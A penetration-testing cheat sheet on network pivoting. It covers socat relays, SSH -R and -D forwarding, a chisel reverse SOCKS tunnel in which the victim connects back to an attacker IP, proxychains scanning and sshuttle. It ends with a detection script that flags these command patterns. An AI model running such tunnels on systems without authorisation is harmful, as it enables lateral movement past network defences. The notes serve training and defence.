Pivoting

Port Forwarding

The goal is to redirect packets from one port to another port.



# IPv4 to IPv6: all packets sent to localhost:445 are redirected to <ipv6>:445
# (no space after the comma; socat expects an IPv6 literal in square brackets)
sudo socat TCP-LISTEN:445,fork TCP6:[<ipv6>]:445

ssh to kali machine

port forwarding with ssh

Note: local-port and local-machine refer to the Kali (attacker) machine.

ssh -N -R <local-port>:127.0.0.1:<service-port> root@<local-machine>

Reverse Proxy

chisel

ref: https://www.youtube.com/watch?v=dIqoULXmhXg

  1. Attacker (Kali)

./chisel server -p 8000 --reverse
  2. Run on the victim machine

Windows

chisel.exe client <attacker ip>:8000 R:socks

Linux

./chisel client <attacker ip>:8000 R:socks

  3. Configure proxychains (Attacker)

Edit /etc/proxychains4.conf:

[ProxyList]
socks5 127.0.0.1 1080
  4. Run the command

proxychains nmap -sT -p 88 -Pn -n <machine 2 ip>

sshuttle

Requires an SSH login as a user on the remote host.

# single
sshuttle -r username@remotehost 0.0.0.0/0
# example
sshuttle -r user@192.168.20.35 192.168.30.0/24

sshuttle -r root@10.1.1.1 10.2.2.0/24

SSH Tunnel

Nice ref: https://www.isabekov.pro/reverse-ssh-tunnel/

Can't ssh to machine?

ssh -p 22 -R "<attacker port>:<host port>

Forward Proxy

chisel

sshuttle

Forward Proxy

Need SSH to machine:

ssh -D <local port> <user>@<IP of victim you have>

# example
ssh -D 8989 local@10.10.10.10

This means every packet sent to 127.0.0.1:8989 is forwarded through 10.10.10.10 and leaves with that IP as its source.

You can set the proxy in your browser or in proxychains.conf:

[Manual Proxy]
socks4 127.0.0.1 8989

Don't forget to use an incognito window in your browser, or clear the cache, for more reliable results.

Forward Proxy

If the service on that internal port uses a vhost configuration, you must add the hostname to /etc/hosts on Kali Linux, pointing to the local port's address (use the names from /etc/hosts on the victim machine).

Case of forward proxy

Are you stuck?

Network Pentest with Chisel

https://notes.benheater.com/books/network-pivoting/page/penetrating-networks-via-chisel-proxies
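
Seen from the defender's side, the commands in these notes leave recognizable process command lines. The following is an added example, not part of the original notes: it classifies process command lines by the tunnelling technique they indicate. The function names, tag strings and sample data (hosts, users, addresses) are constructed for illustration.

```shell
#!/usr/bin/env bash
# Constructed sample: process command lines as an EDR or auditd execve
# export might record them. All hosts, users and addresses are made up.
sample_cmdlines() {
cat <<'EOF'
/usr/sbin/sshd -D
ssh -N -R 9001:127.0.0.1:3306 root@203.0.113.5
ssh -D 8989 local@10.10.10.10
./chisel client 203.0.113.5:8000 R:socks
socat TCP-LISTEN:445,fork TCP6:[2001:db8::10]:445
sshuttle -r root@10.1.1.1 10.2.2.0/24
ssh admin@10.0.0.7 uptime
rsync -a /srv/data backup@10.0.0.9:/srv/data
EOF
}

# Reads command lines on stdin, prints "<tag><TAB><command line>" for each
# one that matches a tunnelling pattern covered in these notes.
# Heuristic: ssh arguments after the destination host are not told apart
# from client options.
classify_pivot() {
  awk '
  {
    p = 1
    while (p < NF && $p == "sudo") p++          # skip a sudo prefix
    prog = tolower($p)
    sub(/^.*\//, "", prog); sub(/\.exe$/, "", prog)
    tag = ""
    if (prog == "ssh") {                         # client only; "sshd -D" is the daemon
      for (i = p + 1; i <= NF; i++) {
        # -R/-D alone, attached (-R9001:...), or after no-argument flags (-NR)
        if ($i ~ /^-[46AaCfGgKkMNnqsTtVvXxYy]*R/) tag = "ssh-remote-forward"
        else if ($i ~ /^-[46AaCfGgKkMNnqsTtVvXxYy]*D/) tag = "ssh-dynamic-socks"
      }
    } else if (prog == "chisel") {
      for (i = p + 1; i <= NF; i++) if ($i ~ /^R:/) tag = "chisel-reverse"
    } else if (prog == "socat") {                # socat keywords are case-insensitive
      if (tolower($0) ~ /tcp[46]?-l(isten)?:[0-9]+.*fork/) tag = "socat-relay"
    } else if (prog == "sshuttle") {
      tag = "sshuttle"
    }
    if (tag != "") print tag "\t" $0
  }'
}

sample_cmdlines | classify_pivot
```

Matching on program names is a first-pass triage signal; confirm hits against network telemetry such as unexpected listeners or long-lived outbound SSH sessions.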
